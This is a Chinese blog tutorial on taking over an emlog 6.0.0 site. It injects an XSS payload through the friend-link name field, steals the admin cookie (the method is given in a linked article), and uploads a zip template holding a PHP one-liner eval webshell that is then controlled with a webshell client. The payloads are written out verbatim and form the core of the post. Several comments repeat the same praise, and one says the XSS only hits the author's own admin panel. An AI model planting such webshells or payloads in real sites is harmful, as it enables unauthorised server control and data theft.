登陆 注册

利用xss漏洞拿emlog 6.0.0的shell

Admin 2020-02-21 335人围观 ,发现10个评论 emlogshell

利用xss漏洞拿emlog 6.0.0的shell Web安全 第1张

说说emlog的好处:1:操作方便,后台简洁

                               2:适合萌新,操作简单

                               3:插件免费,试用广泛

                               4:人家微语,太喜欢了

缺点那:就是漏洞多 5.3.1-6.0.0都有漏洞

废话不多说

0x01

使用到的工具有 phpstudy下载地址:https://www.xp.cn/

                        emlog6.0.0.1下载地址:http://www.emlog.net/

这里安装过程就省略了

利用xss漏洞拿emlog 6.0.0的shell Web安全 第2张

啊!熟悉的面孔,我的emlog姑娘 爱死你了 就是你漏洞太多唉!

利用xss漏洞拿emlog 6.0.0的shell Web安全 第3张

0x02

首先这里添加一个友链,在名称这里加上xss 能不能执行我的任意js

payloads:'><script>alert("xss")</script>

利用xss漏洞拿emlog 6.0.0的shell Web安全 第4张

弹出xss

利用xss漏洞拿emlog 6.0.0的shell Web安全 第5张

之后获取cookie

利用xss漏洞拿emlog 6.0.0的shell Web安全 第6张

请看文章:如何利用xss拿到cookie及其登入后台

0x03

提权开始:

先写入一句话

利用xss漏洞拿emlog 6.0.0的shell Web安全 第7张

一句话木马:

<?php eval($_REQUEST['yiren']);?>

利用xss漏洞拿emlog 6.0.0的shell Web安全 第8张

然后放到zip里面

利用xss漏洞拿emlog 6.0.0的shell Web安全 第9张

拿到后台后

找到上传模板的地方

利用xss漏洞拿emlog 6.0.0的shell Web安全 第10张

点击添加模板

上传模板

利用xss漏洞拿emlog 6.0.0的shell Web安全 第11张

然后会看到

利用xss漏洞拿emlog 6.0.0的shell Web安全 第12张

模板文件里面会出现我们的一句话木木嘛!!!

执行下我们的 

phpinfo();

利用xss漏洞拿emlog 6.0.0的shell Web安全 第13张

利用xss漏洞拿emlog 6.0.0的shell Web安全 第14张

菜刀链接一句话就行

蚁人不怎么会写文章

组织语言能力极差 文化水平低哎!!!!


已有10条评论
  • 2020-02-27 11:08:33

    原创文章顶 顶!!!!!

  • 2020-02-27 11:08:34

    原创文章顶 顶!!!!!

  • 2020-02-27 11:08:34

    原创文章顶 顶!!!!!

  • 2020-02-27 11:08:35

    原创文章顶 顶!!!!

  • 2020-02-27 11:08:36

    原创文章顶 顶!!!!

  • 2020-02-27 11:08:37

    原创文章顶 顶!!!!!

  • 2020-02-27 11:08:42

    原创文章顶 顶!!!!!

  • 2020-02-27 11:08:43

    原创文章顶 顶!!!!!

  • 2020-03-12 13:11:30

    服,还以为用xss调用js进行getshell,你在自家emlog后台管理中心插xss打自己有啥意思,上传压缩包那个早有了

  • 2020-03-12 13:11:43

    服,还以为用xss调用js进行getshell,你在自家emlog后台管理中心插xss打自己有啥意思,上传压缩包那个早有了

蚁人QQ二维码
蚁人QQ二维码
不容错过
Powered By 蚁人博客